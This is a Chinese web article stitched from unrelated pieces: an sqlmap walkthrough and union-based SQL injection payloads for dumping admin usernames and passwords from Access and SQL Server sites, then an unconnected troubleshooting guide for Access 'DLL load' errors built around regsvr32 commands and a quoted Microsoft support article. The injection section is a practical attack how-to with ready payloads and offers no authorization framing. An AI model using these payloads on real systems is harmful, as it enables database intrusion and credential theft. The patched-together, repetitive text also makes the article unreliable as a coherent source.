access数据库注入(sqlmap怎么注入ACCESS数据库)

很多朋友对于access数据库注入和sqlmap怎么注入ACCESS数据库不太懂，今天就由小编来为大家分享，希望可以帮助到大家，下面一起来看看吧！

sqlmap怎么注入ACCESS数据库

首先我们先来跑表

命令是sqlmap–u“url/NewsShow.asp?id=69”–tables

一路上大家遇到这个

可以直接选择回车

等到了这里

大家选择线程1到10

开始扫表。你也可以在出现admin这个表的时候按下ctrl+c就可以终止然后就获取表

然后我们直接再次输入命令sqlmap–u“url/NewsShow.asp?id=69”–colunmns–T admin

然后得到了里面的字段username password id

然后我们直接跑字段内容sqlmap–u“url/NewsShow.asp?id=69”–dumps–T admin–C“username,password”

然后一路还是回车。到了

8

还是选择线程1到10

最后跑出了用户名。密码

怎么快速获取access、SQLServer数据

1.使用access数据库的系统存在SQL注入漏洞;mssql数据库也支持这个技术 2.需要知道欲爆数据所在的表的表名以及这个表下的一个字段名，一般都是id字段使用本技术显而易见的优势在于： 1.可以不需要引号，过滤引号对本技术没有影响 2.可以快速的知道敏感数据的

1.使用access数据库的系统存在SQL注入漏洞;mssql数据库也支持这个技术

2.需要知道欲爆数据所在的表的表名以及这个表下的一个字段名，一般都是id字段

使用本技术显而易见的优势在于：

1.可以不需要引号，过滤引号对本技术没有影响

2.可以快速的知道敏感数据的内容，而不必像以往一样慢慢的猜解，中文、特殊字符等等都通杀

3.在SQL Server屏蔽了错误信息之后仍然可以快速得到敏感数据内容

4.可以在不知道关键(欲知数据的)字段名的情况下仍然能够获取到欲知数据

咋一看可能这个技术很难，其实很简单。一共有两个难点，一般的第一个难点在看到结果以后都很容易想到，但是第二个难点却的确有点点麻烦。

首先看一个表格，是union的语法。这也是爆出数据的主要原理。如下图所示：

当我们使用SQL Inject技术插入union语句以后，只要两个select查询得到的列数相同，那么整条SQL语句执行完成以后，得到的查询结果就变成了union后面select得到的数据。所以就有可能将我们所需要的数据爆出来。来看一个简单的例子：

?SoftID=3903%20union%20select%20username,password,1,1,1%20from%20admin

这是一个SQL Server的服务器，关闭了错误信息的回报，所以不能够按照以往的方法直接得到敏感数据。通过SQL Inject插入union语句以后，可以大胆的猜测到所执行的SQL语句变成了：

select* from Soft where SoftID=3903 union select username,password,1,1,1 from admin

那么在正常情况下显示Soft第1、2个字段值得地方就会显示admin的username和password字段，后面的3个1也是同理替代了。按照这个特性，我们当然也可以直接得到Admin_UserInfo表里面的username和password字段。构造的语句如下所示：

?SoftID=3903%20union%20select%20username,password,1,1,1%20from%20Admin_UserInfo%20where%20username

access 加载DLL错误

一到如下路径：C:\Program Files\Common Files\Microsoft Shared\DAO找到扩展名为DLL或dll的两个文件。我的这两个文件分别是 DAO350.DLL dao360.dll

二将你刚才找到的两个文件复制到你安装“Office办公软件”的“OFFICE11”文件夹下面。例如我是复到如下路径：G:\Office2003\OFFICE11，因为我是将Office2003安装到G盘Office2003里面。

三在注册表里注册这两个文件：

因为我是将这两个文件都放到了G:\Office2003\OFFICE11\下面。

在开始菜单运行里输入：如下注册路径：

Regsvr32.exe"G:\Office2003\OFFICE11\DAO350.DLL"

Regsvr32.exe"G:\Office2003\OFFICE11\dao360.dll"

四还有一种方法是来自百度的回答

将C:\ProgramFiles\CommonFiles\MicrosoftShared\DAO下的dao360.dll和Msado15.dll复制到C盘根目录下。然后运行：

Regsvr32.exe"C:\dao360.dll"

Regsvr32.exe"C:\Msado15.dll"

就OK了，注意，dao360.dll和Msado15.dll也打以复制到如C:\ee下，相就的运行就改变了：

Regsvr32.exe"C:\ee\dao360.dll"

Regsvr32.exe"C:\ee\Msado15.dll"

这样的目的的是防止路径中出现空格造成无法识别dao360.dll和Msado15.dll的真正路径。

原理：access导入xls,txt.doc等文件时，需要调用dao360.dll和Msado15.dll这两个文件，而有的盗版的office无法注册这两个文件的信息，造成加载dll失败。

五择自网上

如何处理MS Access 2000+以上的出现的“加载DLL”错误信息最近在将外部数据库（EXCEL、文本文件、其他数据库文件）导入到MS ACCESS 2000+中的时候就遇到“加载DLL”的错误信息，开始以为缺少什么文件，于是用安装文件进行了修复，但是结果还是一样。于是，只好Google一下，发现了一个很好的解决方案： http://support.microsoft.com/kb/833220/zh-cn

===============================

症状

当您尝试在 Microsoft Access 2002,使用 Microsoft Access向导,例如导入文本向导或导入表格向导,可能会收到以下错误信息。当您尝试打开由切换面板管理器,创建窗体可能会收到以下错误信息：

加载 DLL中错误

原因

如果缺少 Microsoft Data Access Components(MDAC)文件、损坏 MDAC文件或计算机上过时 MDAC文件可能发生此问题。

解决方案

要解决此问题,请使用下列方法之一：

方法 1：

注册需要 Dao 360.dll文件和 Msado15.dll文件

您可能需要通过使用 Regsvr32.exe程序注册 Dao 360.dll文件和 Msado15.dll文件。要这样做,请按照下列步骤操作：

1.开始,依次运行。

2.在运行对话框中,在打开框中,键入以下命令，然后单击确定：

Regsvr 32.exe"<< Dao360.dll_Path>>"

Regsvr 32.exe"<< Msado15.dll_Path>>"

<< Dao360.dll_Path>>占位符是 Dao 360.dll文件的绝对路径。

<< Msado15.dll_Path>>占位符是 Msado15.dll文件的绝对路径。

以下示例显示如何可能指定一个绝对路径：

Regsvr32.exe" C:\Program Files\Common Files\Microsoft Shared\DAO\Dao360.dll"

Regsvr32.exe" C:\ProgramFiles\Common Files Files\system\ado\Msado15.dll"

如果成功注册 Dao 360.dll文件,收到信息是类似于以下消息：

C:\Program Files\Common Files\Microsoft Shared\DAO\Dao360.dll中的 DllRegisterServer成功。

如果成功注册 Msado15.dll文件,收到信息是类似于以下消息：

在 C:\ProgramFiles\Common Files Files\system\ado\Msado15.dll DllRegisterServer成功。

3.单击确定。

方法 2：

安装最新版本的 MDAC。

===============================================

经过试验，发现两个方法都行不通。但是，最后还是从方法1中得到启发，因为C:\Program Files\Common Files\Microsoft Shared\DAO\Dao360.dll确实是存在，但是注册不上。最后考虑是否由于路径中的空格符引起，于是将这个文件拷贝到系统目录（windows\system32）下（当然也可以是任何非空格符路径下）。再次使用Regsvr32命令，终于成功了。

接下来，MS ACCESS 2000+的DLL错误问题也得到了解决。看来在安装的时候就留下了隐患，只是没有用到就忽略了罢。

六相关知识择自网上

大家注册DLL或OCX的方法应该用Regsvr32.exe，用得多了大家一定会觉得在运行中写一长串东西很是烦人吧！这里我向大家介绍一种麻烦一次方便“一生”的方法。这个方法只要右击你想注册或反注册的OCX或DLL就可以了。它的原理是通过修改注册表使右击OCX或DLL文件时出现注册和反注册的菜单项。下面介绍这个方法注册DLL文件：打开HKEY_CLASSES_ROOR\Dllfile，新建项shell，再其下新建Register。你会发现Register就是右键弹出的菜单名，再在其下建command，修改其“默认值”为Regsvr32%1反注册DLL文件：打开HKEY_CLASSES_ROOR\Dllfile，新建项shell，再其下新建Unregister，再在其下建command，修改其“默认值”为Regsvr32%1/u。注册和反注册OCX文件打开HKEY_CLASSES_ROOR\OCXfile，然后其它的方法和上面的一样的了。右击一个OCX或DLL试试看，出现了我们想要的Register和Unregister菜单项。 Activex注册和反注册工具——Regsvr32使用过Activex的人都知道，Activex不注册是不能够被系统识别和使用的，一般安装程序都会自动地把它所使用的Activex控件注册，但如果你拿到的一个控件需要手动注册怎么办呢？如果修改注册表那就太麻烦了，在Windows的system文件夹下有一个regsvr32.exe的程序，它就是Windows自带的Activex注册和反注册工具。它的用法为： regsver32详解 regsvr32 [/s] [/n] dllname

其中dllname为activex控件文件名，建议在安装前拷贝到system文件夹下。参数有如下意义：/u——反注册控件/s——不管注册成功与否，均不显示提示框/c——控制台输出/i——跳过控件的选项进行安装（与注册不同）/n——不注册控件，此选项必须与/i选项一起使用如笔者要注册一amovie.ocx控件，则打入regsvr32 amovie.ocx即可，要反注册它时只需使用regsvr32/u amovie.ocx就行了。 regsvr32/s APIINEX.dll注册DLL文件regsvr32/s/u APIINEX.dll卸载DLL文件regsvr32 Shortcut.ocx注册ocx文件regsvr32/u Shortcut.ocx卸载ocx文件/s.dll,.ocx注册成功后不显示提示信息。/u.dll,.ocx卸载

可把注册控件的命令放入批处理文件中。 regedit/s adofre15.reg

直接把注册信息注入注册表。

END，本文到此结束，如果可以帮助到大家，还望关注本站哦！